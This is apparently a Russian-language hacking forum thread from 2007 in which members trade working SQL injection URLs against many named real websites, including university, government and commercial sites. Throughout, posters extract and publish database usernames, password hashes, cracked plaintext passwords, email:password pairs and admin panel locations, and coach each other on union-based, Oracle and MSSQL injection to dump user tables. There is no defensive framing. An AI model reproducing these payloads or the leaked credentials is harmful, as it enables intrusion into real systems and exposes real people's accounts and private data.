http://www.uazmadi.ru/works.php?id=-2+union+select+1,2,3,4/*

NOmeR1

29.05.2007, 09:26

NOmeR1

29.05.2007, 09:32

_Pantera_

29.05.2007, 09:53

Смотрим название картинки :)
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+USER(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+VERSION(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+DATABASE(),2/*
Пароль от ROOT (хеш)
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+user,2+from+mysql.user/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+password,2+from+mysql.user/*

во первых пиши все одним запросом, почитай про concat(), во вторых твой запрос не верен, он должен быть вот таким
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+1,2,concat(user,char(58),password) ,4,5,6,7,8,9,10+from+mysql.user/*
root:1fc1948a4f4019c6
root:
:
wordpress:4c939e2e4400bf8a
wiki:368560a9410169b5
phpbb2:77c86717526fcef9
phpesp:723444a11c4122af
iocrew:60bb08ca538d775c
liverank:0991050a06133626
356forum:1c3c515b47e848a9
forum:0f0dbe0300330c1b
wikiuser:1fc1948a4f4019c6

Scipio

29.05.2007, 11:19

http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+USER()/*
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+VERSION()/*
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-176+union+select+DATABASE()/*

там 5 мускул

http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=176+union+select+concat(table_ name,0x3a,column_name)%20from%20INFORMATION_SCHEMA .columns/*

вот схема:aimresponses
--search
--reply
--link
--conditions
benhelp
--toline
--fromline
--subject
--cc
--message
--date
--owner
calendar
--type
--name
--description
classaides
--aide
classannc
--text
--time
classes
--title
--teacher
--room
--department
--period
--semester
--classtime
--description
--fallyear
classsched
--sid
--name
--comment
--assndate
--assntype
--block
--instime
comments
--cid
--uname
--time
--comment
coursedisc
--discid
directory
--streetadd
--city
--stateprov
--zip
--phone
--email
--homepage
--message
discussions
--title
--type
--subtype
--description
--time
--hits
--prevdiscid
files
--action
--contents
groupmembers
--uname
groups
links
--slave
maliasDB
--username
--oneway
parentlinks
--student
passwd
--passwd
peoplelinks
--friend
prefs
--title
--fnamecfg
--mnamecfg
--cols
--fileexpert
--commanderror
registrations
--fname
--lname
--mname
--type
--email
--streetadd
--city
--stateprov
--zip
--phone
--students
--uname
--owner
--status
scheds
--semester
--id
--fallyear
userinfo
--fname
--lname
--mname
--id
--grp
--class
--permissions
--lastlogin
--lastip

Ky3bMu4

29.05.2007, 12:13

http://www.razvitie.su/news.php?id=-116+union+select+1,version(),3,4/*
http://www.nukuteater.ee/news.php?news_id=-60+union+select+1,2,version(),4,5,6/*

Cond

29.05.2007, 13:41

www.maineservicecommission.gov
http://www.maineservicecommission.gov/news/release.php?ID=-1+union+select+1,2,version(),user(),database(),6,7 ,8,9,10,11,12/*
www.tam.ca.gov
http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,concat(version(),0x3a,user()%20 ,0x3a,database()),4/*

Ky3bMu4

29.05.2007, 14:20

http://www.psat.wa.gov
http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+concat(user(),version()),2,3,4,5, 6,7,8/*

_GaLs_

29.05.2007, 15:57

http://www.rudtp.ru/icc.php?id='+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8/*
http://www.cmbc.ru/courses.php?ID=-2'+union+select+1,2,concat(version(),0x3a,database ()),4/*

GlooK

29.05.2007, 16:19

http://www.nero.com/eng/showpress.php?id=1'
13 столбцов.
Что-то у муну UNION не получаетца...

ultimatum

29.05.2007, 17:11

SQL

http://market.ya1.ru/market_search.php?search=%271%2C2%2C3%2C4%2F**%2F% 3C%3F%2B%24www%3D%24_get%5B

Как дальше продолжуть я незнаю.Стоит фильтр.Всё перепробовал.Наверное это говорит о том что мало опыта в иследовании sql

http://market.ya1.ru/market_search.php?search=%27union%2Bfrom%2Bselect% 2Buser%2C2%2C3%27%2F*

так же нашел

http://market.ya1.ru/market_search.php?search=12%2F**%2F%3C%3F%2B%24www %20%20%3D%24_get%5B%22.ru%22%5D%3B%3F%3E%3F%3E%3F% 3E%3F%%20%203E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E %ED%E0%E2%E5%20%20%F0%ED%EE%E5+%E4%E0%ED%ED%EE%E5+ %EC%EE%E6%ED%EE+%E%20%20A%E0%EA-%F2%EE+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%FC+%2C%F2 %20%20%EE%EB%FC%EA%EE+%FF+%ED%E5%E7%ED%E0%FE+%EA%E 0%EA+%%20%2029%29

последнее к sql не относиться, но как ипользовать не знаю

kamaz

29.05.2007, 19:56

GlooK
Он и не может получиться:)
http://www.nero.com/eng/showpress.php?id=1233+AND+ascii(lower(substring(Ve rsion(),1,1)))=51/*
3 версия

http://www.shejay.net/artistDetail.php?userID=2193%20and%201=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13, 14,15,16,concat(username,char(58),password,char(58 ),email),18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33%20from%20users/*
admin:kellyshe
Логиниться на той же странице

Ky3bMu4

29.05.2007, 20:45

...

http://www.ethanolrfa.org/resource/papers/view.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.volunteermaine.org/news/release.php?ID=-251+union+select+1,2,concat(user(),version()),4,5, 6,7,8,9,10,11,12/*
http://www.grrn.org/releases/release.php?rid=79&rhid=1&id=-10+union+select+1,concat(user(),version()),3,4,5,6 ,7/*

kair

29.05.2007, 22:14

http://www.chayka.org/article.php?id=4630%20union%20select%201,table_nam e,3,4,5,6,7,8,9,0,1%20from+INFORMATION_SCHEMA.TABL ES limit+0,1/*

CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, Articles, ArticlesAuthors, Authors, Issues, Old_Articles, Old_ArticlesAuthors, Old_Issues, ibf_admin_logs, ibf_admin_sessions, ibf_attachments, ibf_badwords, ibf_calendar_events, ibf_categories

Scipio

29.05.2007, 22:26

...

http://www.ethanolrfa.org/resource/papers/view.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

вот некоторые аккаунты:
формат:
email: password

danny.allison@bioenergy.abengoa.com:chancesr
tallsop@newenergycorp.com:51673
lisa_royal@admworld.com:lisa
nantoniades@lallemand.com:lalleman
denco@dencollc.com:willb

и т.д. просто надоело...

Cond

29.05.2007, 22:32

curious.astro.cornell.edu
http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,char(58),password),2,co ncat(version(),0x3a,user()%20,0x3a,database()),4,5 ,6+from+mysql.user/*

kair

29.05.2007, 22:34

www.legionhardware.com
pass 1243
login Steve

http://www.legionhardware.com/document.php?id=4630%20union%20select%201,2,3,4,5, 6,7,8,email,10,11,password,13,14,15,16,17,18,19,20 ,21,name,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77%20from%20users/*

Dracula4ever

30.05.2007, 11:36

http://www.consodurable.org

http://www.consodurable.org/dossiers_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Grey

30.05.2007, 11:43

http://www.ethology.ru/news/?id=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8/*

Constantine

30.05.2007, 12:00

http://bip.kielce.rio.gov.pl/index.php?go=22&id_k=-93+union+select+1,2,3,concat(version(),char(58),us er(),char(58),database())/*

Кому несложно соберите все проделанные иньекции с 214 страницы по эту. Спасибо

Ky3bMu4

30.05.2007, 12:05

...

http://rus.militaryantiqueshop.com/view.php?id=-548+union+select+version(),2,3,user(),5,6,7,8,9/

*
http://teplo.lakkk.com/shop.view.php?product_id=-975+union+select+1,2,version(),user(),5,6,7,8,9

,10,11,12,13,14,15,16/*

NOmeR1

30.05.2007, 12:22

http://www.autobam.ru/language/?catalogue&id=-5+union+select+1,2,VERSION(),4,5/*
http://www.autobam.ru/language/?catalogue&id=-5+union+select+1,2,USER(),4,5/*
http://www.autobam.ru/language/?catalogue&id=-5+union+select+1,2,DATABASE(),4,5/*Ща времени нет.. Убегаю)

Ky3bMu4

30.05.2007, 12:25

...

http://www.articolo21.info/news.php?id=-20116+union+select+1,2,3,4,5/*
http://www.suederelbe.info/content.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Cond

30.05.2007, 14:11

journalism.berkeley.edu
http://journalism.berkeley.edu/events/details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,version(),24,database(),26,u ser(),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/*

NOmeR1

30.05.2007, 17:37

http://www.a1tv.ru/AOpenBands.php?Band=-57+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5/*

stagediver

30.05.2007, 17:41

подбираем имена таблиц, осуществляем последовательный вывод записей и преодолеваем экранирование кавычек в ORACLE:

http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+union+select+1,null,null,null,table_name||chr(58 )||column_name||chr(58)||data_type+from+(select+a. *,rownum+rnum+from+(select+*+from+user_tab_columns +where+table_name=chr(76)||chr(79)||chr(71)||chr(7 3)||chr(78)||chr(83)+order+by+column_name)+a+where +rownum+%3C=+1)+where+rnum+%3E=+1--

rObad

30.05.2007, 18:39

Парламент Грузии
http://www.parliament.ge/index.php?lang_id=ENG&sec_id=36&info_id=-16000+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT (concat(user,0x3a,password),0x71),0x71),6,7,8,9,10 ,11,12,13+from+mysql.user/*
root:6b8c7ae75e3ec972
мускул 4 ветки

geezer.code

30.05.2007, 20:06

вот и от меня, только не могу подобрать колонку с паролем
http://www.hakiminternational.com/cpCommerce/category.php?id_category=-1+union+select+1,email,3,4+from+cpAccounts+where+l evel=3/*

зы подобрал колонка pass

хэш - 5e8e3302732abbc67998f8ccd0362dad

ззы пароль- hakim1
email - info@hakiminternational.com

Boccob

30.05.2007, 20:07

psyplanet.ru
http://psyplanet.ru/page.php?id=-6+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7/*
http://psyplanet.ru/article.php?id=-29+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7,8/*
http://psyplanet.ru/artgalery.php?id=-27+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7,8,9/*
http://psyplanet.ru/lib.php?na=author&id=-3+union+select+1,concat(user(),0x3a,version()),3,4 ,5,6/*
http://psyplanet.ru/foto.php?id=-20+union+select+1,2,3,concat(user(),0x3a,version() ),5,6,7,8,9,10,11/*
http://psyplanet.ru/label.php?id=-17+union+select+1,2,concat(user(),0x3a,version()), 4,5,0x2e2e2f2e2e2f6e6577732e6a7067/*
http://psyplanet.ru/interv.php?id=-15+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7,8,9,10/*
http://psyplanet.ru/profil.php?id=-32+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7/*
http://psyplanet.ru/obzor.php?id=-9+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7,8,9,10/*
Отпишитесь в ПМ, если кто-нибудь сможет раскрутить хоть одну из них.

[53x]Shadow

30.05.2007, 20:28

Для начала

http://psyplanet.ru/profil.php?id=-6+UNION+SELECT+1,2,3,name,5,6,7+from+profile+where +id=31/*
Дальше перебор по id ;)
Есть еще таблица user.

Серенький

30.05.2007, 20:31

psyplanet.ru

ничего, что не в личку?
есть таблица user (user_name,user_pass)

http://psyplanet.ru/page.php?id=-6+union+select+1,2,concat_ws(0x3a,user_id,user_nam e,user_pass,user_icq,status),4,5,6,7+from+user+lim it+5,1/*
с админскими записями, админка тут: http://www.psyplanet.ru/admin/

0rt

30.05.2007, 21:14

http:// db.peacelink.org/campagne/info.php?id=-1+union+select+1,2,3,4,5,6/* index.php?id=67 +union+select+1,concat(user(),char(58),version()), 3,4,5,6,7/*
http://www .htmlbook.ru/content/?id=97+union +select+1,2,concat(user (),char(58),version())/*

http://www.pcbsd.org/index.php?id=67+u nion+select+1,concat(user(),char(58),version()),3, 4,5,6,7/*

http://www.i d.isu.ru/news/index.php?id=4 1+union+select+1,2,3,4,5,column_ name+from+information_schema.columns+where+table_n ame='phpbb_users'/*

http://www.ad ilsoz.kz/site.php?lan=russian&id=539&pub=-1+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13 /*

fYt

31.05.2007, 02:39

http://www.cleanedge.com/views.php?id=428900000+union+select+1,2,3,4,5,6,co ncat(USER(),char(59),DATABASE(),char(59),VERSION() ),8,9,10,11,12/*

http://www.moresca.com/views.php?id=222222222+union+select+1,2,3,4,5,6,7, 8,concat(USER(),char(59),DATABASE(),char(59),VERSI ON()),10,concat(username,char(59),password),12,13, 14,15,16,17+from+users/*

http://dinchen.jtagice.com/views.php?id=0000000065777+union+select+1,2,3,4,co ncat(user,char(59),password),6,7,8,9,10,11,concat( USER(),char(59),VERSION(),char(59),DATABASE()),13+ from+mysql.user/*

http://www.procasapanama.com/views.php?id=31111111+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19/*

http://crca.ucsd.edu/views.php?id=222222+union+select+1,2,concat(user,c har(58),password)+from+mysql.user/*

v1ru$

31.05.2007, 17:54

psyplanet.ru

ничего, что не в личку?
есть таблица user (user_name,user_pass)

с админскими записями, админка тут:
http://www.psyplanet.ru/admin/
Tester
1111

Ky3bMu4

31.05.2007, 17:57

http://www.biosmagazine.co.uk/press-release.php?id=-8570+union+select+1,2,3,4,user(),version(),7,8,9,1 0,11,12,13,14,15,16/*
http://www.lincstrust.org.uk/news/press-release.php?article=-87+union+select+1,2,user(),version(),5,6,7/*
http://www.stargallery.co.uk/dmx-release.php?release=-36+union+select+user(),2,version()/*
http://www.alt.ac.uk/news_detail.php?nid=-113+union+select+1,version(),3,user(),5,6/*

geezer.code

31.05.2007, 18:07

эту раскрутить не смог

http://www.mvd.uz/index.php?action=news&nid=&nwid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12&type=1

А вот тут, логиница в админку можно, только с определенных ip адресов, адреса все лежат в iis ((
http://www.tfi.uz/?page=news&info=full&idCode=164'+union+select+top+1+1,username+from+use rs--

gibson

31.05.2007, 19:37

эту раскрутить не смог

http://www.mvd.uz/index.php?action=news&nid=&nwid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12&type=1

епть ты хоть сморишь куда лезешь

http://www.dsk1ko.ru/dsk1ko/pricelist/ApartmentList/default.aspx?ID=-1+unon+select+1,version(),3,4/*

Ky3bMu4

31.05.2007, 19:45

http://www.y12.doe.gov/

http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,user(),3,4,version(),6,password, 8,9,10+from+mysql.user/*

User: y12admin
Password:*B239D061C8CD910D991D58C252274C9DABA049B9 (чё это за хеш? SHA?)
http://www.smoothwall.ltd.uk/

http://www.smoothwall.ltd.uk/support/knowledge/view.php?id=-42+union+select+1,user(),version(),4,5,6,7,8,9,10, 11,12,13,14,15,16/*

geezer.code

31.05.2007, 19:46

епть ты хоть сморишь куда лезешь

а что , я ничего, вообще ничего не сделал ))

http://www.groundhigh.com/cpCommerce/category.php?id_category=-1+union+select+1,concat(email,0x3a,pass),3,4+from+ cpAccounts+where+level=3/*

info@groundhigh.com:make1ts0

KPOT_f!nd

31.05.2007, 23:09

http://www.dukemednews.com/news/article.php?id=-9979+union+select+user,2,3,4,5,password,7,8+from+m ysql.user/*
root:623460e26f081bbc + еще имееться усеры
http://www.dcresource.com/news/newsitem.php?id=-3436+union+select+1,2,user(),database(),5,6,7,8,9/*
Ky3bMu4 http://www.y12.doe.gov/ уже есть...

Пчел

31.05.2007, 23:45

geezer.code

01.06.2007, 02:49

ООО «Столовое серебро»
http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,5,6/*
USER: silverspoons@localhost
DATABASE: silverspoons
VERSION: 4.1.7

Не знаю как узнать имена таблиц :confused:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,concat(name,0x3a,pass), 6+from+users/*boa:b5ecf32b4295a600b9f49f290aa3d55e
boauser:526840b891f4b4fb0dc7ce8a5fb98426
юрик:159ca38bb232c9433f3fe892fc1578da

итд, там таких много )), щас попробуем хэши пробить.

ps вот boa:boass
pps админ по ходу юрик:yurik

geezer.code

01.06.2007, 03:21

http://www.uyghurinfo.net/index.php?cc=6&sc=0+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6/*
подбирать таблицы лень

CRL

01.06.2007, 11:11

Помогите пожалуйста. Я вот с Sql не очень и такой вопрос:
http://www.southrussian.ru/dog.php?id=882' вот здесь вылазит ошибка mysql_fetch_array() потом я пытался подобрать столбцы используя, как учили, uinion select. Так я дошел до 20 и ничего не происходит. Так вот что мне делать?) Еще я где то читал про использование order by для определения количества столбцов. Расскажите пожалуста.

Joker-jar

01.06.2007, 11:18

CRL, http://www.southrussian.ru/dog.php?id=-1+union+select+version(),2,3,4,5,6/*

http://www.southrussian.ru/dog.php?id=-1+union+select+concat(name,0x3a,password),2,3,4,5, 6+from+users/*

CRL

01.06.2007, 12:04

Спасибо) У меня появился тогда еще вопрос(последний)
http://prospectus.ulster.ac.uk/course/?id=2435+UNION+select+1,2,3/*
Здесь подобрал а дальше не могу придумать, просто я совсем растение в sql.

Добавлено
На сайте про собак (southrussian.ru) логин ADMIN и пароль 123456

Constantine

01.06.2007, 12:12

Нужно перейти к несуществующим значениям ID, т.е -2435
и подобрать имя таблицы
http://prospectus.ulster.ac.uk/course/?id=-2435+UNION+select+1,2,3+from+user/*

l1ght

01.06.2007, 12:15

forum.sunrise.ru
http://forum.sunrise.ru/forum.asp?FORUM_ID=36+or+1=(select+top+1+table_nam e+from+information_schema.tables+where+table_name+ not+in+('jiaozhu','FORUM_REPLY','FORUM_TOPICS','t_ jiaozhu','FORUM_MODERATOR','FORUM_ALLOWED_MEMBERS' ,'dtproperties','FORUM_TOTALS','FORUM_CATEGORY','F ORUM_MEMBERS','FORUM_FORUM','FORUM_CONFIG'))--
Yfi4hevSMS:Admin
админка:
http://forum.sunrise.ru/admin_login.asp
mmis.umt.edu
http://mmis.umt.edu/CCFacil.asp?cName=Missoula&Type=County&Number=4'+or+1=(select+top+1+table_name+from+infor mation_schema.tables+where+table_name+not+in+('m_L ogBuySpecies','syssegments','sysconstraints','m_Lo gBuy','ca_history','ca_holding','ca_lendar','ca_ev enttype','dtproperties','ca_topictype','m_Activiti es','cm_city','m_BBER','m_changeLog','m_contacts', 'm_contacttype','m_EvalSurvey','m_CURFORMailList', 'm_equipprocess','m_facil_hold','m_contacts_hold', 'm_facilprod','m_inputdist','m_groups','m_LogPrice MailList','m_NAICS','m_Outlook03','m_outputdist',' m_PrimBus','m_inputs','m_prod_hold','m_products',' m_productstatus','m_SecondaryWoodSurvey2005','m_fa cility','m_SpecialtyLogMailList','m_vwcertNameAbbr ev','m_TechList','m_vwcerts','m_VWCONTACTS','m_vwe quipprocess','m_vwfacility','m_vwfacilprod','m_VWF orAccess','m_vwinputs','m_SIC','m_vwLogBuySpecies' ,'m_vwlogbuy','m_vwTechList','mf_globals','mID_vwC ontacts','mID_vwfacilprod','r_db','mID_vwfacility' ,'r_orgtype','r_keywords','r_vwdb','m_SenateFinanc e1','r_services','m_certs','cm_county'))--
chslovo.com
http://www.chslovo.com/include/output_articles.asp?Id=1+or+1=(select+top+1+table_ name+from+information_schema.tables+where+table_na me+not+in+('articles','Ans','Que','Site_Articles', 'Site_Articles1','Site_Forum_A_TOPICS','Site_Forum _ALLOWED_MEMBERS','Site_Forum_CATEGORY','Site_Foru m_CONFIG_NEW','Site_Forum_FORUM','Site_Forum_A_REP LY','Site_Forum_GROUPS','Site_Forum_GROUP_NAMES',' Site_Forum_MEMBERS','Site_Forum_MEMBERS_PENDING',' Site_Forum_MODERATOR','Site_Forum_REPLY','Quiz','S ite_Forum_SUBSCRIPTIONS','Site_Forum_TOPICS','Site _Forum_TOTALS','Site_Numbers','Site_numbers1','Sit e_Rubrics','Site_Pictures','Site_Users','Site_User s_Conf','Site_Texts','Site_Users_Privs','Site_User s_Emails','View_Adv_Search','sysconstraints','syss egments','t_jiaozhu','D99_Tmp','dtproperties'))--
admin:ghjcnjnfr

http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать

тут нету иньекции... вывод ошибки не sql.
посл. вывод вывод в ссылке:
http://webmascon.com/archive/topic.asp?id=-1+union+select+1,2,3,version(),database(),6,user()/*

Ky3bMu4

01.06.2007, 13:39

http://www.tehorng.com/

http://www.tehorng.com/release.php?release=-11959+union+select+1,2,3,4,user(),password,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26+from+mysql.user/*

User:tehorng
Password(хеш): *5837662AE1DB0E6C8864BF4F5F3600EA202395E1

http://www.gamerevolution.com

http://www.gamerevolution.com/manifesto/view.php?id=-264+union+select+1,2,user(),version(),5,6,7,8,9,10 ,11/*

CRL

01.06.2007, 14:47

Muhacir

01.06.2007, 16:56

Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log
http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*

А вот еще http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*
Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки.

databse: nuke
version: 4.1.20-log
user: root
pass: *D4BBC2141A32BB10BC1641424058A822737B0876
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,database(),version (),user(),password+from+mysql.user

Micr0b

01.06.2007, 18:40

http://www.tyndall.ac.uk/generate/staffprint/staff-view.php?id=-1+UNION+SELECT+1,2,3,4/*

http://gopanthers.fit.edu/sports_info/view.php?id=-11+UNION+SELECT+1,2,3,4/*

http://www.ecodefense.ru/view.php?id=-431+ORDER+BY+11/*

http://www.tam.ca.gov/view.php?id=-14+UNION+SELECT+1,2,3,4/*

http://www.b-connect.ru/view.php?cid=111'

просто ошыбка, ищо непроверял на инж. если есть иекцыя то можно будет посидень на чужом компе=)

http://www.ccp-austria.at/view.php?id=52'
Notice: Undefined offset: 0 in D:\Inetpub\wwwroot\www.ccp-austria.at\view.php on line 213

RaDDeaD

01.06.2007, 19:41

Сайты кланов Великой игры , КОМБАТСРУ

Чем паролики зашифрованы ? MD4 (base64) ??

http://www.sdb-clan.ru/?p=comment&id=-1+union+select+1,2,concat(login,0x3a,email,0x3a,pa ss)+from+user/*

и ещё
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*

Edited by ice1k:
- не стоило писать 7ым размером шрифта: "Сайты кланов Великой игры , КОМБАТСРУ" - это всего лишь сайт отдельного клана.

ice1k

01.06.2007, 21:31

Чем паролики зашифрованы ? MD4 (base64) ??
Да, это base64.

и ещё
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*
Можешь подампить базу тут:
_http://mbclan.org/forum/install/upgrade_301.php?step=hello

NOmeR1

02.06.2007, 00:25

http://www.houseofbamboo.in/category.php?catid=-81+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6,7/*
Гы, чёто больше ничего сделать не могу =\

NOmeR1

02.06.2007, 00:31

http://www.maty.co.in/products.php?catid=-1+union+select+1,2,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),4,5,6,7/*
Не везёт мне.. Больше ничего сделать не могу.
http://www.bluepages.co.in/subcategory.php?catid=-63+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE())/*
Та же песня.
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=-212+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,concat(user,0x3a,password),6,7, 8,9,10,11,12+from+mysql.user/*
root:45ddce093e0d5d85
Вот терь гуд :)
http://cmcludhiana.in/news_flash.php?newsid=-16+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),4,5,6/*
Вот..
http://www.mannadey.in/view_news.php?newsid=-53+union+select+1,USER(),3,4,VERSION(),DATABASE(), 7,8,9/*
Вот эта скуля меня радует :)
http://www.bishopmoorecollege.in/php/newsEvents.php?NewsID=-57+union+select+concat(USER(),0x3a,VERSION(),0x3a, DATABASE())/*
Хаха :)))
http://polandembassy.in/NewsDetail.php?news_id=-169+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
:o
http://www.lake-house.in/news/View.php?news_id=-16+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6/*
Для тех кто знает китайский =\ :)

fjuDao

02.06.2007, 03:49

_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*

Neorin

02.06.2007, 09:55

_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*

чуть не правельно постоил....попробуй так)))
http://www.koss.ru/press.php?id=666+union+select+1,concat(USER(),0x3a ,VERSION(),0x%203a,DATABASE()),3,4,5,6,7,8,9,10,11 ,12/*

вот тогда как красиво получиться))))

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/koss-www/classes/article_out.php on line 47

Edited by ice1k:
Склеил твои посты. Впредь не пиши по несколько постов подряд - редактируй пост и добавляй.

kamaz

02.06.2007, 14:19

2Neorin
Непонял малость...
У fjuDao правильно (в отличии от тебя) запрос построен.

И в свете недавней темы:
http://contaximages.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,conca t(user_nickname,char(58),users.user_email,char(58) ,users.user_passwd),8,9,0,11%20from%20users/*
http://www.harphampix.com/v2/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,conca t(user_nickname,char(58),users.user_email,char(58) ,users.user_passwd),8,9,0,11%20from%20users/*

Пчел

02.06.2007, 15:03

geezer.code

02.06.2007, 16:20

Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt

Компания Стокмэн
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version() ,6,7/*

USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log

Уря наконец, попался 5 мускул )) можно поупражняться в использовании information_schema )
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,Table_name,database(),4,versi on(),6,7+from+information_schema.tables+limit+35,1/* Получили таблицу ms_user

Попытался терь получить имена столбцов
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,vers ion(),6,7+from+information_schema.columns+where+ta ble_name='ms_user'+limit+0,1/* но что-то незаладилось, может чтото делаю неправильно ?

Пчел

02.06.2007, 16:29

Попытался терь получить имена столбцов
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,vers ion(),6,7+from+information_schema.columns+where+ta ble_name='ms_user'+limit+0,1/* но что-то незаладилось, может чтото делаю неправильно ?

Да, что-то у меня тоже не получается вывести имена стобцов :mad:

kamaz

02.06.2007, 16:39

2Пчел
Если не знаешь, что сказать, то лучше промолчать.
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,2,column_name,4,5,6,7+from+in formation_schema.columns+where+table_name=CHAR(109 ,115,95,117,115,101,114)+limit+0,1/*

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(user_login,char(58),us er_passwd,char(58),user_email),3,4,5,6,7+from+ms_u ser/*

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(login,char(58),name,ch ar(58),password),3,4,5,6,7+from+ms_access_users/*

Пчел

02.06.2007, 17:27

2kamaz
Я просто этим постом попросил о помощи, но понял что ты имел в виду. Кстати, спасибо что помог разобраться. Что бы не было офтопом:

General Store Publishing House!
http://www.gsph.com/index.php?ID=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37/*&Lang=EN

USER: indelta_cms@75.126.146.102
DATABASE: indelta_gsph
VERSION: 5.0.37-standard-log

GooD and EviL

02.06.2007, 19:46

http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/*

V.I.P

02.06.2007, 21:55

Самые крупные БД когда либо я брал.

Сайт: www.visionlearning.com
Версия: 4.0.26
Колличесвто юзеров: 31001
http://www.visionlearning.com/library/flash_viewer.php?oid=-21+union+select+1,concat_ws(char(58),username,pass word,email),3,4+from+users+limit+31000,31001/*

ice1k: Убрал аптайм.ру. Не забываем посматривать антибоян:
_http://hack-shop.org.ru/sql.php
Ok.

